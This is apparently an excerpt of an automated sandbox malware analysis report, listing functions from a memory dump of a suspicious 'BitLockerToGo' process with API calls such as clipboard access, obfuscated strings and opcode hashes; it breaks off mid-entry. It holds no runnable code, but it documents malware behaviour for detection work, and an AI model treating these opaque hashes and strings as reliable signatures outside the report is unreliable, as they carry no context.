                                                                                                                                                                  • Instruction ID: 41dcff501d060be0fa26fe21e11fb197e45a9d341551556065711dd1a7c404f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e818ca0d223ae447f2deb6b3f9836376c2f2508e8ffab67bc586ed1fabb8eab
                                                                                                                                                                  • Instruction Fuzzy Hash: 4CD1BAB4648344DBD350EF14E880A2EBBF5EBA9385F100D2DE6C48B391D335CA55CB92
                                                                                                                                                                  Function 02D01A32 Relevance: 9.8, APIs: 1, Strings: 4, Instructions: 1013COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 6T^t$Xl&X$|eqz$|n =
                                                                                                                                                                  • API String ID: 0-3902992610
                                                                                                                                                                  • Opcode ID: 265efcb6554ea9aa54b61563c7b21381bea66c16f9e1d22c70d8597c62cfefad
                                                                                                                                                                  • Instruction ID: fad5a80348aeca6c18c38fc7429385539a673901c37492c4339f2b384e944d70
                                                                                                                                                                  • Opcode Fuzzy Hash: 265efcb6554ea9aa54b61563c7b21381bea66c16f9e1d22c70d8597c62cfefad
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D72CD70504B808BD7258F39C4A87A7BBE1AF16308F588C6DD4DB877A2DB35E945CB60
                                                                                                                                                                  Function 02D07C60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2832541153-0
                                                                                                                                                                  • Opcode ID: 40e14d61589eb0e55843c2b785a8a2bd9cd1ee01880d5ad5e9a89bdd02c1b32a
                                                                                                                                                                  • Instruction ID: 2c8b9193b77c904d883ef751ef5bed07efc786772d177d89eb3de6761755b5e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 40e14d61589eb0e55843c2b785a8a2bd9cd1ee01880d5ad5e9a89bdd02c1b32a
                                                                                                                                                                  • Instruction Fuzzy Hash: C8419EB0908785CEE711AB78D48836FBFF1AB01304F04882CD4EA9B791D375A958CB63
                                                                                                                                                                  Function 02CD1293 Relevance: 7.1, Strings: 5, Instructions: 890COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0$0$0$@$i
                                                                                                                                                                  • API String ID: 0-3124195287
                                                                                                                                                                  • Opcode ID: d4eeb6a5683aa02b9b31c2d861db7a31c220129a65425c071eea391379ed7cff
                                                                                                                                                                  • Instruction ID: c897e630b41c2d5eaa942dd6a9ad8292d9e02bafcfeaf25fc90eafce67ebc81e
                                                                                                                                                                  • Opcode Fuzzy Hash: d4eeb6a5683aa02b9b31c2d861db7a31c220129a65425c071eea391379ed7cff
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F620871A0C3418FD315CE29C49076AFBE2AFC5314F188A5DEAD987392D774DA45CB82
                                                                                                                                                                  Function 02CFADC0 Relevance: 6.8, Strings: 5, Instructions: 533COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: &]R_$4`[b$4`[b$SdTb$sndW
                                                                                                                                                                  • API String ID: 0-702967961
                                                                                                                                                                  • Opcode ID: dec767256b323df6e8f6c4baaf9f9d6aed2c20d07fdafe7ef78b7bc70ff072a7
                                                                                                                                                                  • Instruction ID: 8c144f61e477a9b84a0f37ddd0a7bb66eceb147a846040d0804a1a84db201e16
                                                                                                                                                                  • Opcode Fuzzy Hash: dec767256b323df6e8f6c4baaf9f9d6aed2c20d07fdafe7ef78b7bc70ff072a7
                                                                                                                                                                  • Instruction Fuzzy Hash: EC12B9B1A08340ABE3608F54D890B6FBBE6FF99349F058C2CE5898B391D774D944CB52
                                                                                                                                                                  Function 02CF02C0 Relevance: 5.7, Strings: 4, Instructions: 686COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: rr$Q_$US$sq
                                                                                                                                                                  • API String ID: 0-638576893
                                                                                                                                                                  • Opcode ID: 186848c532f947108960e6e38ffb029209ad9e37c10118c7e63d1248ba49f163
                                                                                                                                                                  • Instruction ID: aba38e06ef899c499e00896b99f0021f48f94fdcb2f30dd6501723e482c57b58
                                                                                                                                                                  • Opcode Fuzzy Hash: 186848c532f947108960e6e38ffb029209ad9e37c10118c7e63d1248ba49f163
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C2257B440C3809FC350EF18D881A2ABBF5AF96754F048D1CE5D89B252E379DA15CBA7
                                                                                                                                                                  Function 02CF1280 Relevance: 5.5, Strings: 4, Instructions: 524COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $$ZhSj$ZhSj$y
                                                                                                                                                                  • API String ID: 0-982382964
                                                                                                                                                                  • Opcode ID: b99475ed39c6aeda1a809b72076d617b5fd70e8f06482733098f6874bf14161e
                                                                                                                                                                  • Instruction ID: b17da07da2680be7982d3336c4b813095df252985de45d360f644b475e0f91bf
                                                                                                                                                                  • Opcode Fuzzy Hash: b99475ed39c6aeda1a809b72076d617b5fd70e8f06482733098f6874bf14161e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A027A75508380ABD340EB14D880B6FBBEAEF85344F08882DF6C997251D775D919DBA3
                                                                                                                                                                  Function 02D07DE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                                                                  • Opcode ID: e510b217eb4115cdcddb8bbd3544ddae469f90c55fc43cdb0c778cab4745f8b8
                                                                                                                                                                  • Instruction ID: cb0566e23e734ce8502b6478e477877a4a38c98b91e206b3f95a1041fa332119
                                                                                                                                                                  • Opcode Fuzzy Hash: e510b217eb4115cdcddb8bbd3544ddae469f90c55fc43cdb0c778cab4745f8b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 81A178B46093908BD760DF29D64878BBBE1FBA4348F00995DE8DD8B352D7749848DF82
                                                                                                                                                                  Function 02CD84F0 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: )$)$IEND
                                                                                                                                                                  • API String ID: 0-588110143
                                                                                                                                                                  • Opcode ID: 0a5d36c2539e3f19c20214c77e969635834ffb7d8fd332ac74bfbd452066542c
                                                                                                                                                                  • Instruction ID: 39af3d51c6f2289482110df4951683df35242fea18d08ff8b129e2e96576ff0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5d36c2539e3f19c20214c77e969635834ffb7d8fd332ac74bfbd452066542c
                                                                                                                                                                  • Instruction Fuzzy Hash: 97E1B4B1A08741AFE310CF25C84471BBBE1BF94318F044A2DEA9997381E775E916CBD2
                                                                                                                                                                  Function 02CE2431 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 690COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 02D07DE0: GetSystemMetrics.USER32 ref: 02D07E29
                                                                                                                                                                    • Part of subcall function 02D07DE0: GetSystemMetrics.USER32 ref: 02D07E3C
                                                                                                                                                                  • CoUninitialize.OLE32(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001), ref: 02CE26C8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MetricsSystem$Uninitialize
                                                                                                                                                                  • String ID: #2?
                                                                                                                                                                  • API String ID: 1128523136-1241500918
                                                                                                                                                                  • Opcode ID: c892397ec6f8665d0f2fb5af10b76ab21e9b1d776e99d8a18ed5171735c6311f
                                                                                                                                                                  • Instruction ID: a038ece5ee6191f4427679d8066ff87398106f0a2d422019e05a661339c7a076
                                                                                                                                                                  • Opcode Fuzzy Hash: c892397ec6f8665d0f2fb5af10b76ab21e9b1d776e99d8a18ed5171735c6311f
                                                                                                                                                                  • Instruction Fuzzy Hash: F222CCB55002818FE7219F24D490B2ABBF2FF56304F28489CD4C68B742D776E956DF92
                                                                                                                                                                  Function 02CD3570 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Inf$NaN
                                                                                                                                                                  • API String ID: 0-3500518849
                                                                                                                                                                  • Opcode ID: 96a96999979bb4f5b9d5df31ec9da0570a8c68c21c9e58d0c7ee4e051c7708e1
                                                                                                                                                                  • Instruction ID: 7fbf02dcbedaa80578efb09b25a916816f9f23a9848d87c1dda2a5de384f79f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 96a96999979bb4f5b9d5df31ec9da0570a8c68c21c9e58d0c7ee4e051c7708e1
                                                                                                                                                                  • Instruction Fuzzy Hash: FBD1D472A083419BC704CF29C88061ABBE5FFC8750F258A6EE99997390E775DD45CF82
                                                                                                                                                                  Function 02CF6890 Relevance: 2.9, Strings: 2, Instructions: 415COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b$y'&
                                                                                                                                                                  • API String ID: 0-3578682820
                                                                                                                                                                  • Opcode ID: a15c87b771199d5be67310511d24a8193a8b7292021ba3a3dbfca7fc26a6b3dc
                                                                                                                                                                  • Instruction ID: f67db8af9eb520a30333a9a652760083296be8c704a68a3b0d676157d147637c
                                                                                                                                                                  • Opcode Fuzzy Hash: a15c87b771199d5be67310511d24a8193a8b7292021ba3a3dbfca7fc26a6b3dc
                                                                                                                                                                  • Instruction Fuzzy Hash: 53C1E1715083009BD790AF24C881A2BB7F9EF86314F29881CEAE5C7391E335DA54DB62
                                                                                                                                                                  Function 02D014D0 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ..9 $2_k
                                                                                                                                                                  • API String ID: 0-4108207982
                                                                                                                                                                  • Opcode ID: c9d75d8d3584cfa3f4be8c49a72d702cb10d90f99ab2ae12119b768fba63a97f
                                                                                                                                                                  • Instruction ID: 6350391beb9626e04f9746bef72b2ea790395357cde8c82b00314ef608eaf49d
                                                                                                                                                                  • Opcode Fuzzy Hash: c9d75d8d3584cfa3f4be8c49a72d702cb10d90f99ab2ae12119b768fba63a97f
                                                                                                                                                                  • Instruction Fuzzy Hash: 90D1B770408B808BD7328F25C4907A3BBE1AF46355F548A5CD4EB4B792D739BA49CB91
                                                                                                                                                                  Function 02CE20AC Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: F\[R$[rsb
                                                                                                                                                                  • API String ID: 0-4043967235
                                                                                                                                                                  • Opcode ID: 952d60ac5ca20f739180e96449d44868cfd8edf9fe95a1b5dae20aa5cb64f232
                                                                                                                                                                  • Instruction ID: 5381d971890480a9ed4a44627a5dd8e819f3568d731b9cd655c68a79d3877512
                                                                                                                                                                  • Opcode Fuzzy Hash: 952d60ac5ca20f739180e96449d44868cfd8edf9fe95a1b5dae20aa5cb64f232
                                                                                                                                                                  • Instruction Fuzzy Hash: 868135B01002819FDB258F29C490B26BBB1EF56348B24888DD8D68F352D736DA47CFA1
                                                                                                                                                                  Function 02CFE457 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: IK$MO
                                                                                                                                                                  • API String ID: 0-2884483713
                                                                                                                                                                  • Opcode ID: 1a66382b2c942b0ec36bc777c01823e5fca9e1e69b99eed846bafe7066c2b76b
                                                                                                                                                                  • Instruction ID: f37d1ab6085b95a78f6d2d39fcaa123de6e71509698ce1ada053281e5a576a50
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a66382b2c942b0ec36bc777c01823e5fca9e1e69b99eed846bafe7066c2b76b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0271AFB480032ACBCB60CF94C850BBFBBB1FF46355F144949E996AB3A1E334A941CB55
                                                                                                                                                                  Function 02CF8BC3 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: )mi${vqa
                                                                                                                                                                  • API String ID: 0-1217653995
                                                                                                                                                                  • Opcode ID: c08d46633766878664ab629f4822a3f67255562f51fd894c5db368fecb394341
                                                                                                                                                                  • Instruction ID: 721dc0f2e08b8d0b10a054dde127295969e58bf26a08074e978012ff4f7d4514
                                                                                                                                                                  • Opcode Fuzzy Hash: c08d46633766878664ab629f4822a3f67255562f51fd894c5db368fecb394341
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51BB72E007158BDB91CF95C8807EFB7B2EF85310F198928C6956B391D734A945CFA0
                                                                                                                                                                  Function 02CE301B Relevance: 2.5, Strings: 1, Instructions: 1233COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: 18a0c6261c139b2dafc8015094fd636db4b40803b83e0d0f4efd97c367c66c94
                                                                                                                                                                  • Instruction ID: 1422ac3dd3807229416d58cc65789d2c3692cfcec6b658006d24c88fb7ff67e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 18a0c6261c139b2dafc8015094fd636db4b40803b83e0d0f4efd97c367c66c94
                                                                                                                                                                  • Instruction Fuzzy Hash: A19275B4A007819FDB358F28D880B26BBF2EF4A304F1449ADD49B87B51E735B955CB90
                                                                                                                                                                  Function 02D13430 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: f
                                                                                                                                                                  • API String ID: 0-1993550816
                                                                                                                                                                  • Opcode ID: fab7f4302ee6a13f238d7dc2bdf6daeab90a8e89cc9c07123dffbed442e34018
                                                                                                                                                                  • Instruction ID: 249047abe597261eb0c9e93433a019f52bb5b79c3be46d414096272699d2fed5
                                                                                                                                                                  • Opcode Fuzzy Hash: fab7f4302ee6a13f238d7dc2bdf6daeab90a8e89cc9c07123dffbed442e34018
                                                                                                                                                                  • Instruction Fuzzy Hash: E212BE71608341AFD754CF18D880A2BBBE2EBC8718F588AADF89587791D731DC04CB92
                                                                                                                                                                  Function 02CD5130 Relevance: 1.8, Strings: 1, Instructions: 530COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: %1.17g
                                                                                                                                                                  • API String ID: 0-1551345525
                                                                                                                                                                  • Opcode ID: 564d6ac4a6176eb9bf1e64f579638e0ae758e6f85fb3fde78b478efce5f8fd10
                                                                                                                                                                  • Instruction ID: e3d6b0240a419093ac68a310b72d41493c7c2a11ece4376a469d163994bf2eeb
                                                                                                                                                                  • Opcode Fuzzy Hash: 564d6ac4a6176eb9bf1e64f579638e0ae758e6f85fb3fde78b478efce5f8fd10
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D0209B6A083418BE7258E19C44032BFBE2EFE0398F99C56DDE998B341E771D945C781
                                                                                                                                                                  Function 02CF6630 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.OLE32(02D1CB80,00000000,00000001,02D1CB70), ref: 02CF6659
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                  • Opcode ID: 4b468561f77ba6bd5f489559f709e8507db9d1afd722221570fe7b55113decb9
                                                                                                                                                                  • Instruction ID: 631719434d47e6d27816a13e8a97b33b39a32df2435c67a76f65b4aac887b8aa
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b468561f77ba6bd5f489559f709e8507db9d1afd722221570fe7b55113decb9
                                                                                                                                                                  • Instruction Fuzzy Hash: EC51DFB1600204ABDBA09F24CC96B7773B8EF85368F244958FA95CB390F375E945C762
                                                                                                                                                                  Function 02D03430 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: >PFz
                                                                                                                                                                  • API String ID: 0-1275006623
                                                                                                                                                                  • Opcode ID: 79725f800f0fbf78667d5e2252da664b139ae985496333cd3cf91ca1859e00b6
                                                                                                                                                                  • Instruction ID: f7950f1186d6dd8c56c1731e291a49c014794dc53e701154dc2c9d77d349649b
                                                                                                                                                                  • Opcode Fuzzy Hash: 79725f800f0fbf78667d5e2252da664b139ae985496333cd3cf91ca1859e00b6
                                                                                                                                                                  • Instruction Fuzzy Hash: F8F14E74405B808BD7328B359894BA3BBE0BF1B206F44199DD4EB9B3D3E325A805CF65
                                                                                                                                                                  Function 02D00140 Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                  • Opcode ID: 3899840dd6577e7ca3d74759588182d0d0c4f5f9147254c434b95e4f40c5f024
                                                                                                                                                                  • Instruction ID: ebf4e8690476927b0aca72fa91fa229519a6d3fa996cf29326e02b5c06141288
                                                                                                                                                                  • Opcode Fuzzy Hash: 3899840dd6577e7ca3d74759588182d0d0c4f5f9147254c434b95e4f40c5f024
                                                                                                                                                                  • Instruction Fuzzy Hash: 14C125B2A083407BD725CE24C4D4B6FB7EAAB84315F09852DE5998B3E1E734DD44C792
                                                                                                                                                                  Function 02D17D00 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: P
                                                                                                                                                                  • API String ID: 0-3110715001
                                                                                                                                                                  • Opcode ID: a830e02f5fe9769212a35483d4b11db67bc995c07a06aabb79049acd1ecb86f1
                                                                                                                                                                  • Instruction ID: 0c54d238689a14dac77e94f31d0ce62f4e0476ca5acee5eab7c0d3c73aeb8ae1
                                                                                                                                                                  • Opcode Fuzzy Hash: a830e02f5fe9769212a35483d4b11db67bc995c07a06aabb79049acd1ecb86f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD1F3729082649FE725CE18E49071FB7E2EB85718F168A2CE8A5AB7D0C771DC45C7C1
                                                                                                                                                                  Function 02CDCA20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: -
                                                                                                                                                                  • API String ID: 0-2547889144
                                                                                                                                                                  • Opcode ID: bc0346d41aa82dc48f836a2e84bded1eadd7f03e369ed267d654814e52d14c91
                                                                                                                                                                  • Instruction ID: 1a495bc08441e041fdfb501c60f3341e032f65a9631652324b4e545b16b38cf6
                                                                                                                                                                  • Opcode Fuzzy Hash: bc0346d41aa82dc48f836a2e84bded1eadd7f03e369ed267d654814e52d14c91
                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC13771A0C7118BC315CF28C89026ABBE3EFC1314F198A1EE6D65B3A5D734AA45CBC1
                                                                                                                                                                  Function 02CECBE0 Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: a493fac295bc14b8a8112019caaffbfb44c950fdc5e9c3460a93f1d75309ad6b
                                                                                                                                                                  • Instruction ID: 5f322f25c5b64acbf083bd886573c49ad5e36e7d19caab5cdb18bfb0e33ca91a
